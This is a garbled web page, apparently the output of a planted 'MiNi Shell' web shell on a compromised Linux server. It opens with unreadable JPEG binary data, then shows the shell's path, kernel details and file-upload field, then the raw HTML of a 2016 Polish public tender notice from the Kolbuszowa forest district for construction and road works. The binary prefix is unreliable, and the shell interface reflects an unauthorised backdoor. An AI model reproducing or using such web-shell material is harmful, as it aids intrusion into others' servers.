JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161223/373415-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_kolbuszowa/zamowienia_publiczne' target='_blank'>http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_kolbuszowa/zamowienia_publiczne</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 373415 - 2016
              z dnia 2016-12-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kolbuszowa: Wykonanie inwestycji Nadleśnictwa Kolbuszowa w 2017 roku polegające na: Budowa parkingu przy Leśnictwie Poręby Dymarskie, Przebudowa deszczowni w Leśnictwie Nasienno-Szkółkarskim Etap I, Przebudowa placu sprzedaży sadzonek szkółki, Budowa budynku pompowni szkółki, Budowa składu na drewno w Leśnictwie Poręby Dymarskie, Utrzymanie dróg w Nadleśnictwie Kolbuszowa 2017 rok, Odmulenie konserwacja rowów melioracyjnych w Nadleśnictwie Kolbuszowa 2017 rok , Wykonanie szlaków zrywkowych w Nadleśnictwie Kolbuszowa 2017 rok<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Nadleśnictwo Kolbuszowa, krajowy numer identyfikacyjny
              69002709400000, ul.
              Świerczów 
              138,
              36100  
              Kolbuszowa, woj.
              podkarpackie, państwo
              Polska, tel.
              17 581 21 20, e-mail
              kolbuszowa@krosno.lasy.gov.pl, faks
              17 581 21 21.
              <br />
              Adres strony internetowej (URL): http://www.kolbuszowa.krosno.lasy.gov.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka oragnizacyjna nieposiadająca osobowości prawnej Nadleśnictwo Kolbuszowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_kolbuszowa/zamowienia_publiczne</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_kolbuszowa/zamowienia_publiczne</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać w siedzibie Nadleśnictwa Kolbuszowa do dnia 09.01.2017 r. do godz. 9:00<br />
                Adres:
                <br />Świerczów 138,   36-100 Kolbuszowa, pok. Nr 4 </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie inwestycji Nadleśnictwa Kolbuszowa w 2017 roku polegające na: Budowa parkingu przy Leśnictwie Poręby Dymarskie, Przebudowa deszczowni w Leśnictwie Nasienno-Szkółkarskim Etap I, Przebudowa placu sprzedaży sadzonek szkółki, Budowa budynku pompowni szkółki, Budowa składu na drewno w Leśnictwie Poręby Dymarskie, Utrzymanie dróg w Nadleśnictwie Kolbuszowa 2017 rok, Odmulenie konserwacja rowów melioracyjnych w Nadleśnictwie Kolbuszowa 2017 rok , Wykonanie szlaków zrywkowych w Nadleśnictwie Kolbuszowa 2017 rok<br /><b>Numer referencyjny: </b>SA.270.115.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest Wykonanie inwestycji Nadleśnictwa Kolbuszowa w 2016 roku polegające na: Budowa parkingu przy Leśnictwie Poręby Dymarskie, Przebudowa deszczowni w Leśnictwie Nasienno-Szkółkarskim, Budowa placu manewrowego szkółki, Budowa budynku pompowni szkółki, Budowa składu na drewno w Leśnictwie Poręby Dymarskie, Utrzymanie dróg w Nadleśnictwie Kolbuszowa 2017 rok, Odmulenie konserwacja rowów melioracyjnych w Nadleśnictwie Kolbuszowa 2017 rok , Wykonanie szlaków zrywkowych w Nadleśnictwie Kolbuszowa 2017rok z podziałem na części:

Część Nr 1: Budowa parkingu przy Leśnictwie Poręby Dymarskie w tym.:
1.1. Roboty ziemne przygotowawcze.
1.2. Zabezpieczenia istniejących instalacji gazowych 2 linie ziemne.
1.3. Podbudowa parkingu wraz z zjazdami do drogi publicznej.
1.4. Krawężniki i nawierzchnia parkingu.
1.5. Roboty Uzupełniające.
 
Część Nr 2: Przebudowa deszczowni  Etap I, w Leśnictwie Nasienno-Szkółkarskim
2.1. Kanalizacja deszczowa.
2.2. Rurociągi główne wraz ze studzienkami.
2.3. Instalacja zraszająca w korytach DUNEMANA z dyszami zraszającymi.
2.4. Przygotowanie terenu pod montaż rampy deszczującej i budowę budynku .pompowni.
2.5. Demontaż  istniejących koryt DUNEMANA.
2.6. Wykonanie nowych koryt DUNEMANA.
2.7. Rampa deszczująca .
2.8. Kamery  Monitoring.
2.9. Układ sterowania w tunelu foliowym.
2.10. Wymiana zamgławiaczy w tunelu foliowym.
2.11. Remont studni.
2.12. Ujęcie wody ze studnią czerpalną z koszem ssawnym i zaworem zwrotnym.
2.13. Układ napowietrzania zbiornika.
2.14. Zasilania zewnętrzne przekładki kabli.
2.15. Połączenia Budynek urządzenia zewnętrzne.
2.16. Sprawdzenia i pomiary.
Z uwagi na nieprzerwaną produkcję szkółkarską w czasie trwania prac przebudowy deszczowni Etap  I, zamawiający informuje, że należy zwrócić szczególną uwagę i ostrożność  na istniejącą instalację która przez cały czas prowadzenia robót misi funkcjonować.

Część Nr 3: Przebudowa placu sprzedaży sadzonek szkółki.
3.1. Profilowanie i utwardzenie skarp zbiornika otwartego płytami drogowymi z odzysku.
3.2. Kanalizacja deszczowa.
3.3. Demontaż zbiornika na chemikalia.
3.4. Budowa zbiornika bezodpływowego .
Część Nr 4: Budowa budynku pompowni z instalacjami wewnętrznymi i niezbędnymi przekładkami kabli.
4.1. Roboty ziemne .
4.2. Fundamenty.
4.3. Ściany i ścianki.
4.4. Stropodach.
4.5. Izolacje.
4.6. Podłoże posadzki.
4.7. Okna i drzwi .
4.8. Tynki i okładziny .
4.9. Malowanie .
4.10. Roboty blacharskie.
4.11. Elementy zewnętrzne  chodniki.
4.12. Pompownia wody.
4.13. Zasilanie zewnętrzne i przekładki kabli.
4.14. Instalacje elektryczne w budynku pompowni.
4.15. Tablice rozdzielcze.
4.16. Instalacja odgromowa i uziemiająca pompowni.
4.17. Sprawdzenia i pomiary.
4.18. Demontaż .
Część Nr 5: Budowa składu na drewno w Leśnictwie Poręby Dymarskie
5.1. Roboty ziemne przygotowawcze.
5.2. Wykonanie zjazdów do składu drewna 2 zjazdy.
5.3. Podbudowa zjazdu wraz z zjazdami do drogi leśnej.
6.4. Nawierzchnia tłuczniowa składu.
Część Nr 6: Utrzymanie dróg w Nadleśnictwie Kolbuszowa 2017 rok
6.1. Naprawa wyboi do 5 cm
6.2. Naprawa wyboi do 10cm
6.3. Naprawa wyboi do 20cm
6.4. Naprawa podbudowy od 15cm do 20cm
6.5. Odtworzenie przepustów
6.6. Odmulenie rowów przydrożnych
6.7. Wykaszanie poboczy drogowych
Część Nr 7: Odmulenie konserwacja rowów melioracyjnych w Nadleśnictwie Kolbuszowa 2017 rok
7.1. Odmulenie i konserwacja rowów mel. przy śr. głębokości 0,8m, szer. dna 0,4m, szer. górą 1,8
7.2. Odtworzenie istniejących przepustów z rur PCV nośności SN 8 śr. 0,6m, L-6mb
7.3. Odtworzenie istniejących przepustów z rur PCV nośności SN 8 śr. 0,6m, L-8mb
7.4. Praca sprzętem  melioracje wodne
Część Nr 8: Wykonanie szlaków zrywkowych w Nadleśnictwie Kolbuszowa 2017rok
8.1. Mechaniczne karczowanie pni (śr. 10-15 cm)
8.2. Mechaniczne karczowanie pni (śr. 16-25 cm)
8.3. Mechaniczne karczowanie pni (śr. 26-35 cm)
8.4. Usunięcie warstwy ziemi urodzajnej (humusu) o grubości do 15 cm za pomocą spycharek
8.5. Wykopy oraz przekopy wykonywane koparkami przedsiębiernymi 0.40 m3 na odkład w gruncie kat.I-II , rowy przy szlakach odkład na trasę szlaku
8.6. Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV
8.7. Warstwy odsączające wykonane i zagęszczane mechanicznie o gr.20 cm (30cm) z żwiru lub piasku łamanego umożliwiające zagęszczenie
8.8. Nawierzchnia z tłucznia kamiennego od 0 do 32,5mm - warstwa dolna z tłucznia - grubość po zagęszczeniu 10 cm.
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45223300-9,
                45210000-2,
                45111200-0,
                45262310-7,
                45262300-4,
                45262520-2,
                45261000-4,
                45421100-5,
                45262650-2,
                45442100-8,
                45233140-2,
                45310000-3,
                45312100-8,
                45312000-7,
                45311100-1,
                45331000-6,
                45231000-5,
                45223800-4,
                45233220-7,
                45233142-6,
                45233141-9,
                45520000-8,
                45232451-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>- Część Nr 1: Budowa parkingu przy Leśnictwie Poręby Dymarskie  31.07.2017r.
- Część Nr 2: Przebudowa deszczowni  Etap I, w Leśnictwie Nasienno-Szkółkarskim  31.08.2017r.
- Część Nr 3: Przebudowa placu sprzedaży sadzonek szkółki  31.08.2017r.
- Część Nr 4: Budowa budynku pompowni z instalacjami wewnętrznymi i niezbędnymi przekładkami kabli  31.08.2017r.
- Część Nr 5: Budowa składu na drewno w Leśnictwie Poręby Dymarskie  31.07.2017r.
- Część Nr 6: Utrzymanie dróg w Nadleśnictwie Kolbuszowa 2017 rok  31.12.2017r.
- Część Nr 7: Odmulenie konserwacja rowów melioracyjnych w Nadleśnictwie Kolbuszowa 2017 rok  31.12.2017.
- Część Nr 8: Wykonanie szlaków zrywkowych w Nadleśnictwie Kolbuszowa 2017rok  31.12.2017r
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a)wykażą, że posiadają środki finansowe w banku lub spółdzielczej kasie oszczędnościowo-kredytowej lub zdolność kredytową w wysokości co najmniej: dla części nr 1 - 70 000 zł, dla części nr 2  500 000,00zł, dla części nr 3  80 000,00zł, dla części nr 4  75 000,00zł, dla części nr 5  50 000,00zł, dla części nr 6  100 000,00zł, dla części nr 7  25 000,00zł, dla części nr 8  60 000,00zł. W przypadku ubiegania się przez Wykonawcę o więcej części niż jedna należy wykazać dysponowanie środkami pieniężnymi o łącznej sumie wynikającej dla wybranych części.
b)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż: dla części nr 1 - 70 000 zł, dla części nr 2  500 000,00zł, dla części nr 3  80 000,00zł, dla części nr 4  75 000,00zł, dla części nr 5  50 000,00zł, dla części nr 6  100 000,00zł, dla części nr 7  25 000,00zł, dla części nr 8  60 000,00zł.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
a)nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonali należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli co najmniej jedno zamówienie obejmujące swoim zakresem: dla części nr 1  budowę, lub przebudowę parkingu, placu manewrowego, miejsca postoju o wartości netto równej lub wyższej niż 50 000,00 zł, dla części nr 2  budowę lub przebudowę instalacji wodno  kanalizacyjnej, budowę lub przebudowę instalacji deszczującej wraz z instalacjami elektrycznymi i sterującymi o wartości netto równej lub wyższej niż 700 000,00zł, dla części nr 3 - budowę lub przebudowę placu manewrowego, lub przebudowę parkingu o wartości netto równej lub wyższej niż 80 000,00zł, dla części nr 4  budowę lub przebudowę budynku gospodarczego z wykorzystaniem jako pompownia lub hydrofornia o wartości netto równej lub wyższej 150 000,00zł, dla części nr 5  budowę lub przebudowę składu na drewno lub placu manewrowego o wartości netto równej lub wyższej niż 80 000,00zł, dla części nr 6  utrzymanie dróg lub budowę, przebudowę remont drogi  o wartości netto równej lub wyższej niż 100 000,00zł, dla części Nr 7  utrzymanie, konserwację, odtworzenie lub wykonanie rowów melioracyjnych o wartości netto równej lub wyższej niż 30 000,00zł, dla części nr 8  wykonanie, utrzymanie lub naprawę szlaków zrywkowych o wartości równej lub wyższej niż 60 000,00zł.   
b)dysponują lub będą dysponować w okresie wykonania zamówienia i skierują do jego realizacji kierowników robót posiadających uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej i lub branżowej, oraz drogowej w zależności od wykonywania danej części zamówienia.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału w postępowaniu zamawiający żąda następujących dokumentów: 

1)Informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy wystawionej nie wcześniej niż 6 miesięcy przed terminem upływu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu
2)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłaceniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
3)zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
4)oświadczenia wykonawcy o przynależności lub braku przynależności do tej samej grupy kapitałowej, w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia w postępowaniu. 
2.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 ppkt 1)-3) składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio,  że: 
a)nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
b)nie otwarto jego likwidacji oraz nie ogłoszono upadłości. 
3.Dokumenty, o których mowa w pkt. 2 lit. b, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 2 lit. a, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem  terminu składania ofert.
